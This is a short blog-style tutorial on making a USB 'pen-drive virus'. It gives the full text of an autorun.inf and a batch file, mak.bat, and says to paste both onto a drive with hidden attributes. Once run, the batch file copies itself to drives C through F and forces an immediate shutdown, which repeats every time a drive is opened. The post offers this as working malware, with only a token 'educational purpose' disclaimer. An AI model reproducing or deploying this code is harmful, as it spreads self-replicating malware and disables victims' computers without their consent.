
Hey guys i am back with a new trick how to make a pen-drive don't wasting time direct coming to topic
You can make your own pen-drive virus. This is a simple virus created in MS-DOS. This virus saves in your pen drive. The system will shutdown when you open the pen drive. And after the booting, the system shutdowns each and every time when you open any drive of your system. So take all risks your self. I am not responsible for any damage to your system.
1. Connect your pen drive first. Open Notepad and type following:
[autorun]
ShellExecute=mak.bat
[autorun]
ShellExecute=mak.bat
2. And save it as "Autorun.inf ". You should give the same name i.e "Autorun.inf". (Don’t use inverted comas)
3. Open another Notepad document and type following:
@echo off
xcopy "Autorun.inf"/H c:
xcopy "Autorun.inf"/H d:
xcopy "Autorun.inf"/H e:
xcopy "Autorun.inf"/H f:
xcopy "mak.bat"/H c:
xcopy "mak.bat"/H d:
xcopy "mak.bat"/H e:
xcopy "mak.bat"/H f:
shutdown -s -f -t 00
( Just Copy Paste above program )
@echo off
xcopy "Autorun.inf"/H c:
xcopy "Autorun.inf"/H d:
xcopy "Autorun.inf"/H e:
xcopy "Autorun.inf"/H f:
xcopy "mak.bat"/H c:
xcopy "mak.bat"/H d:
xcopy "mak.bat"/H e:
xcopy "mak.bat"/H f:
shutdown -s -f -t 00
( Just Copy Paste above program )
4. Save this file as "mak.bat".
5. Change the properties of the files in "Hidden". Copy the both files(Autorun.inf and mak.bat) in to your pen drive. Reconnect the pen drive. And open the pen drive. You will see the system restart.
USE IT FOR EDUCATIONAL PURPOSE ONLY AND DON’T USE IT ILLEGALLY...!!

0 comments:
Post a Comment